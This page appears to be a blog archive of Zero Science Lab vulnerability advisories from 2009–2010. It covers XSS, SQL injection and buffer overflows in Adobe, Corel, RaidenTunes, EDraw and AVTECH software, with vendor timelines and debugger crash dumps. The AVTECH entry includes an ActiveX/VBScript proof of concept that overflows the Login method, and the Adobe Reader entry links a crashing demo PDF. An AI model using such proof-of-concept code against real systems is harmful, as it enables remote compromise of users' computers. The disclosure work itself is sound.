Posts Tagged ‘ доказ на концепт

Team Johnlong RaidenTunes 2.1.1 Remote Cross-Site Scripting Vulnerability

RaidenTunes 2.1.1 suffers from a Cross-Site Scripting (XSS) vulnerability caused by improper validation of user-supplied input by the music_out.php script thru “p” param. A remote attacker could exploit this vulnerability to execute script in a victim’s Web browser within the security context of the hosting Web site, allowing the attacker to steal the victim’s cookie-based authentication credentials.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4947.php

Vendor: http://forum.raidenftpd.com/showflat.php?Cat=&Board=mp3&Number=51265&page=0&view=collapsed&sb=5&o=0&fpart=

Corel WordPerfect Office X5 and Corel Presentations X5 File Handling Vulnerabilities

- Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

– Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC

Corel Corporation

http://www.corel.com

Version: 15.0.0.357 (Standard Edition)

– Summary: Corel® WordPerfect® Office X5 – Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft® Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft® Office
SharePoint® support, more PDF tools and even better compatibility with Microsoft
Office. It’s everything you expect in an office suite—for less.

– Desc: Corel WordPerfect and Corel Presentations X5 is prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user supplied input with
.WPD (WordPerfect Document) and .SHW (Presentations Slide Show) file. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.

– Tested On: Microsoft Windows XP Professional SP3 (English)

– Vulnerability Discovered By: Gjoko ‘LiquidWorm’ Krstic

– liquidworm gmail com

– Zero Science Lab – http://www.zeroscience.mk

– 09.07.2010

– Vendor status:

[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.

Details:

Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC
Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Title:

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Summary:

Adobe Reader software is the global standard for electronic document sharing. It is the only PDF
file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search,
digitally sign, verify, print, and collaborate on Adobe PDF files.

Vendor:

Adobe Systems Incorporated

Product Web Page:

http://www.adobe.com/

Version tested:

9.3.2
9.3.1

Description:

Adobe Reader suffers from a remote memory corruption vulnerability that causes the application to
crash while processing the malicious .PDF file. The issue is triggered when the reader tries to
initialize the CoolType Typography Engine (cooltype.dll). This vulnerability also affects and crashes
major browsers like: Mozilla Firefox, Opera and Apple Safari. Google Chrome & IE does not crash.
Talking about Blended Threat Vulnerabilities ;).

———————————————————————————–

(bd0.e14): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=313100ee ebx=0211a722 ecx=00000031 edx=02e091a4 esi=00017e58 edi=00000000
eip=08075dc2 esp=0012d478 ebp=0012d488 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
CoolType!CTInit+0x2f827:
08075dc2 660fb644322c movzx ax,byte ptr [edx+esi+2Ch] ds:0023:02e21028=??

———————————————————————————–

Tested On:

Microsoft Windows XP Professional SP3 (English)
Microsoft Windows XP Professional SP2 (English)
Microsoft Windows 7 Ultimate
GNU/Linux Ubuntu Desktop 9.10 (i386) 32-bit
GNU/Linux Fedora 10 (Cambridge) / 2.6.27.41-170.2.117.fc10.i686

Vendor Status:

18.04.2010 – Vendor informed.
18.04.2010 – Vendor replied.
07.05.2010 – Asked vendor for confirmation.
07.05.2010 – Vendor confirms vulnerability.
03.06.2010 – Asked vendor for status.
03.06.2010 – Vendor replied.
24.06.2010 – Vendor reveals patch release date.
29.06.2010 – Coordinated public advisory.

Advisory Details:

Zero Science Lab Advisory ID: ZSL-2010-4943
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4943.php
Adobe Advisory ID: APSB10-15
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-15.html
CVE ID: CVE-2010-2204

Live Demo:

http://www.zeroscience.mk/codes/thricer.pdf

Vulnerability Discovered By:

Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

Повеќе: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4943.php

UK One Media CMS (id) Error Based SQL Injection Vulnerability

Summary: Content Management System (PHP+MySQL)

Vendor: UK One Media – http://www.uk1media.com

Desc: UK One Media CMS suffers from an sql injection vulnerability when parsing query from the id param which results in compromising the entire database structure and executing system commands.

Tested on Apache 2.x (linux), PHP/5.2.11 and MySQL/4.1.22

More details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4942.php

Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

Vendor: Adobe Systems Inc.

Product Web Page: http://www.adobe.com

Version tested: CS3 10.0

Summary: Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.

Desc: When parsing .indd files to the application, it crashes instantly overwriting memory registers. Depending on the offset, EBP, EDI, EDX and ESI gets overwritten. Pottential vulnerability use is arbitrary code execution and denial of service.

Tested on Microsoft Windows XP Professional SP3 (English)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

16.09.2009

Vendor status:

[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.

Zero Science Lab Advisory ID: ZSL-2010-4941

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4941.php

Multiple File Handling Vulnerabilities in Photoshop CS4 Extended

Summary
The Adobe® Photoshop® family of products is the ultimate playground for bringing out the best in your digital images, transforming them into anything you can imagine and showcasing them in extraordinary ways.

Description
Adobe Photoshop CS4 Extended suffers from a buffer overflow vulnerability when dealing with .ABR (brushes), .GRD (gradients) and .ASL (styles) format file. The application failz to sanitize the user input resulting in a memory corruption, overwriting several memory registers which can aid the atacker to gain the power of executing arbitrary code or denial of service.

More info:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4938.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4939.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php

Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities

Title: Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities

Vendor: Adobe Systems Incorporated

Product web page: http://www.adobe.com

Summary: Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player.
These people now have access to some of the best the Web has to offer – including
dazzling 3D games and entertainment, interactive product demonstrations, and online
learning applications. Shockwave Player displays Web content that has been created
by Adobe Director.

Desc: Shockwave Player version 11.5.6.606 and earlier from Adobe suffers from a memory consumption /
corruption and buffer overflow vulnerabilities that can aid the attacker to cause denial of service
scenarios and arbitrary code execution. The vulnerable software fails to sanitize user input when
processing .dir files resulting in a crash and overwrite of a few memory registers.

Tested on: Microsoft Windows XP Professional SP3 (English)

Version tested: 11.5.6.606

(f94.ae4): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8
eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll –
DIRAPI!Ordinal14+0x3b16:
68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????

—————————————————————————————————-

EAX FFFFFFFF
ECX 41414141
EDX FFFFFFFF
EBX 00000018
ESP 0012F3B4
EBP 02793578
ESI 0012F3C4
EDI 02793578
EIP 69009F1F IML32.69009F1F

More info:
http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4937.php
http://www.adobe.com/support/security/bulletins/apsb10-12.html

Edrawsoft Security Advisories

EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC

– EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow vulnerability when parsing .edd file format resulting in an application crash and overwritten few memory registers which can aid the attacker toexecute arbitrary code.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4935.php

——————————————–

EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

– EDraw Flowchart ActiveX Control EDImage.OCX suffers from a denial of service vulnerability when parsing large amount of bytes to the OpenDocument() function, resulting in browser crash and unspecified memory corruption.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4936.php

Olly

AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.

——————————————-

Exception Code: ACCESS_VIOLATION
Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
————————————————–
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
————————————————–
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

Registers:
————————————————–
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘$’$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
————————————————–
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <— CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C34    OR EDX,FFFFFFFF
10006C37    LOCK XADD [ECX],EDX

ArgDump:
————————————————–
EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12    001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
————————————————–
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  […………t…]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [….h………..]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [….t………..]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\………….G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF……….DJ.w]

=============================================
=============================================

Proof Of Concept:
###############################

<object classid=’clsid:8214B72E-B0CD-466E-A44D-1D54D926038D’ id=’kungfuhustle’ />
<script language=’vbscript’>

targetFile = “C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll”
prototype  = “Sub Login (

ByVal Username As String,
ByVal Password As String,
ByVal MediaType As String,
ByVal ConnectType As String

)”
memberName = “Login”
progid     = “AVC781Viewer.CV781Object”
argCount   = 4

arg1=String(1010, “A”)
arg2=”defaultV”
arg3=”defaultV”
arg4=”defaultV”

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4

</script>

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4934.php

Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC

Summary

The eToken PKI Client is the software that enables eToken USB operation and the implementation of eToken PKI-based solutions. These solutions include certificate-based strong two-factor authentication, encryption and digital signing. With the PKI Client your PKI solutions become highly secure, extremely convenient and portable, as you can easily and securely generate and store PKI keys on-board eToken smart card-based devices.

Description

eToken PKI Client is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious ETV file to execute arbitrary code and to cause denial-of-service conditions.

Aladdin

More info: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4933.php